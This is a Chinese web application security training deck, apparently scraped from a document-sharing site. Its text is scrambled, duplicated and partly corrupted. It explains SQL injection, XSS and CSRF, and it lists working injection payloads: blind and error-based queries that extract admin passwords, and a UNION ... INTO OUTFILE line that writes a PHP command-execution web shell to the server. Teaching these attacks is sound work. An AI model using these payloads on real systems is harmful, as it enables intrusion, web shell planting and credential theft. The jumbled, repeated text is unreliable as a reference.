WEB应用安全培训
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
1)>0 oracle And(select ascii(substr(pass,1,1))form admin where
rownum=1)>0
SQL注入-报错
and (select top 1 name from sysobjects)=1
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
CSRF(Cross-site request forgery)跨站请求伪造 。
你这可以这么理解CSRF攻击:攻击者盗用了你的身 份,以你的名义发送恶意请求。CSRF能够做的事情包 括:以你名义发送邮件,发消息,盗取你的账号,甚至 于购买商品,虚拟货币转账......造成的问题包括:个人 隐私泄露以及财产安全。
SQL注入分类:
• 按提交字符类型可分为: 数字型 字符型 搜索型
• 按HTTP提交方式可分为: GET、POST 、Cookie
• 按注入方式可分为: 盲注 、 union注 入、 报错注入、 基于时间注入
• 编码问题:宽字节注入
SQL注入
如何判断?
1.单引号判断 2.数字型注入判断 ①and 1=1 and 1=2
SQL注入
自动化工具
SQLMAP
SQL注入
自动化工具
Havij
SQL注入
自动化工具
Pangolin
XSS跨站脚本攻击
• 漏洞介绍
恶意攻击者往Web页面里插入恶意html代码, 当用户浏览该页之时,嵌入其中Web里面的html 代码会被执行,从而达到恶意攻击用户的特殊 目的。
• XSS本质是在于执行脚本[javascript/html等] 攻击者的js能力越强攻击效果越惊人!
SQL注入
• 漏洞介绍
由于程序中对用户输入检查不严格,用户可以提 交一段数据库查询代码,根据程序返回的结果, 获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
• 原因分析
其本质是由于对输入检查不充分,导致SQL语句 将用户提交的非法数据当作语句的一部分来执行 。
SQL注入
Outlook
恶意代码 隐藏在链 接中
3
“refleΒιβλιοθήκη Baiduted” 4 代码
Web服务器
11
正常访问
恶意代码
5
普通合法会话
恶意代码 执行!
安全上下文: 目标站点
浏览器
安全上下文: 目标站点
浏览器
普通用户客户端
XSS跨站脚本攻击
反射型XSS
XSS跨站脚本攻击
XSS攻击平台
CSRF跨站请求伪造
CSRF是什么?
内容:
<script>恶意代码
34
</sRcer:i谁pt又> 发垃圾广告啦
?
5 恶意代码 执行!
普通用户客户端
XSS跨站脚本攻击
注册用户发帖,内容如下所示
XSS跨站脚本攻击
Admin用户登录浏览刚才的帖子
非持久型跨站脚本攻击场景
攻击者
2
From: 攻击者 To: 用户
免费赠送Q币! !! CLICK HERE
SQL注入-相关表
Sysobjects, syscolumns
Information_schema. TABLES [Table_schema][table_name] Information_schema. COLUMNS
user_tab_columns user_tables
SQL注入-盲注
持久型跨站脚本攻击场景
攻击者
2
在论坛发帖子: 免费获取Q币!!! <script>恶意代码 </script>
1. 正常服务器信息 2. 服务器存储恶意代码 3. 用户浏览网页 4. 服务器将恶意代码返回给用户 5. 客户端浏览器执行恶意代码
Web服务器
1 重要通知
Re:沙发!! Re:地板? Re:地下室沙发…… ReR:e地:下免室费获地取板Q-币_-!!!! !
WEB应用安全培训
常见WEB漏洞 常见WEB后门介绍
常见的Web漏洞
漏洞名称 SQL注入 跨站脚本攻击漏洞 Cookie欺骗 CSRF(跨站请求伪造) Web信息泄露 权限问题 逻辑漏洞 第三方程序漏洞 Web服务器解析漏洞 弱口令 SSRF
漏洞等级 高危 高危 高危 中危 中危 中危 中危 高危 高危 高危 中危
outfile ' C:/apache/htdocs/site/shell.php‘
Load_file(读取文件的路径)
SQL注入
搜索型注入 Select 相应字段 from [表名] where 搜索条件 Like
' 科技%' and 1=1 and '%'='%' [搜索关键字]%' and [payload] and '%'='
Access and (select top 1 asc(mid(id,1,1)) from admin)>0 MSSQL and (select top 1 ascii(substring(password,1,1)) from admin)>0 Mysql And(select ascii(substr(pass,1,1))from admin limit
and 1 is null and 1 is not null and user>0 ②参数进行运算 +1 -1 '+'→'%2B' 3.字符型注入判断 ①' and '1'='1 ' and '1'='2 4.搜索型注入判断 ①test%' and 1=1 and '%'=' test%' and 1=2 and '%'='
||utl_inaddr.get_host_name((select banner from v$version where rownum=1))–
SQL注入
MySQL写文件 and 1=2 union select 1,2,'<?php system($_REQUEST[cmd]);?>',4,5,6 into
• XSS漏洞分类:①反射型XSS ②存储型XSS
XSS跨站脚本攻击
XSS的危害
• 通过XSS执行的javascript,可以做到… – 窃取你正在浏览的cookies信息 – 篡改你正在浏览的页面,注入误导信息 – 捕获你的所有操作,并发送给黑客 – 从定向到黑客的钓鱼站点 – 利用浏览器的漏洞控制你的机器 –…
rownum=1)>0
SQL注入-报错
and (select top 1 name from sysobjects)=1
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
CSRF(Cross-site request forgery)跨站请求伪造 。
你这可以这么理解CSRF攻击:攻击者盗用了你的身 份,以你的名义发送恶意请求。CSRF能够做的事情包 括:以你名义发送邮件,发消息,盗取你的账号,甚至 于购买商品,虚拟货币转账......造成的问题包括:个人 隐私泄露以及财产安全。
SQL注入分类:
• 按提交字符类型可分为: 数字型 字符型 搜索型
• 按HTTP提交方式可分为: GET、POST 、Cookie
• 按注入方式可分为: 盲注 、 union注 入、 报错注入、 基于时间注入
• 编码问题:宽字节注入
SQL注入
如何判断?
1.单引号判断 2.数字型注入判断 ①and 1=1 and 1=2
SQL注入
自动化工具
SQLMAP
SQL注入
自动化工具
Havij
SQL注入
自动化工具
Pangolin
XSS跨站脚本攻击
• 漏洞介绍
恶意攻击者往Web页面里插入恶意html代码, 当用户浏览该页之时,嵌入其中Web里面的html 代码会被执行,从而达到恶意攻击用户的特殊 目的。
• XSS本质是在于执行脚本[javascript/html等] 攻击者的js能力越强攻击效果越惊人!
SQL注入
• 漏洞介绍
由于程序中对用户输入检查不严格,用户可以提 交一段数据库查询代码,根据程序返回的结果, 获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
• 原因分析
其本质是由于对输入检查不充分,导致SQL语句 将用户提交的非法数据当作语句的一部分来执行 。
SQL注入
Outlook
恶意代码 隐藏在链 接中
3
“refleΒιβλιοθήκη Baiduted” 4 代码
Web服务器
11
正常访问
恶意代码
5
普通合法会话
恶意代码 执行!
安全上下文: 目标站点
浏览器
安全上下文: 目标站点
浏览器
普通用户客户端
XSS跨站脚本攻击
反射型XSS
XSS跨站脚本攻击
XSS攻击平台
CSRF跨站请求伪造
CSRF是什么?
内容:
<script>恶意代码
34
</sRcer:i谁pt又> 发垃圾广告啦
?
5 恶意代码 执行!
普通用户客户端
XSS跨站脚本攻击
注册用户发帖,内容如下所示
XSS跨站脚本攻击
Admin用户登录浏览刚才的帖子
非持久型跨站脚本攻击场景
攻击者
2
From: 攻击者 To: 用户
免费赠送Q币! !! CLICK HERE
SQL注入-相关表
Sysobjects, syscolumns
Information_schema. TABLES [Table_schema][table_name] Information_schema. COLUMNS
user_tab_columns user_tables
SQL注入-盲注
持久型跨站脚本攻击场景
攻击者
2
在论坛发帖子: 免费获取Q币!!! <script>恶意代码 </script>
1. 正常服务器信息 2. 服务器存储恶意代码 3. 用户浏览网页 4. 服务器将恶意代码返回给用户 5. 客户端浏览器执行恶意代码
Web服务器
1 重要通知
Re:沙发!! Re:地板? Re:地下室沙发…… ReR:e地:下免室费获地取板Q-币_-!!!! !
WEB应用安全培训
常见WEB漏洞 常见WEB后门介绍
常见的Web漏洞
漏洞名称 SQL注入 跨站脚本攻击漏洞 Cookie欺骗 CSRF(跨站请求伪造) Web信息泄露 权限问题 逻辑漏洞 第三方程序漏洞 Web服务器解析漏洞 弱口令 SSRF
漏洞等级 高危 高危 高危 中危 中危 中危 中危 高危 高危 高危 中危
outfile ' C:/apache/htdocs/site/shell.php‘
Load_file(读取文件的路径)
SQL注入
搜索型注入 Select 相应字段 from [表名] where 搜索条件 Like
' 科技%' and 1=1 and '%'='%' [搜索关键字]%' and [payload] and '%'='
Access and (select top 1 asc(mid(id,1,1)) from admin)>0 MSSQL and (select top 1 ascii(substring(password,1,1)) from admin)>0 Mysql And(select ascii(substr(pass,1,1))from admin limit
and 1 is null and 1 is not null and user>0 ②参数进行运算 +1 -1 '+'→'%2B' 3.字符型注入判断 ①' and '1'='1 ' and '1'='2 4.搜索型注入判断 ①test%' and 1=1 and '%'=' test%' and 1=2 and '%'='
||utl_inaddr.get_host_name((select banner from v$version where rownum=1))–
SQL注入
MySQL写文件 and 1=2 union select 1,2,'<?php system($_REQUEST[cmd]);?>',4,5,6 into
• XSS漏洞分类:①反射型XSS ②存储型XSS
XSS跨站脚本攻击
XSS的危害
• 通过XSS执行的javascript,可以做到… – 窃取你正在浏览的cookies信息 – 篡改你正在浏览的页面,注入误导信息 – 捕获你的所有操作,并发送给黑客 – 从定向到黑客的钓鱼站点 – 利用浏览器的漏洞控制你的机器 –…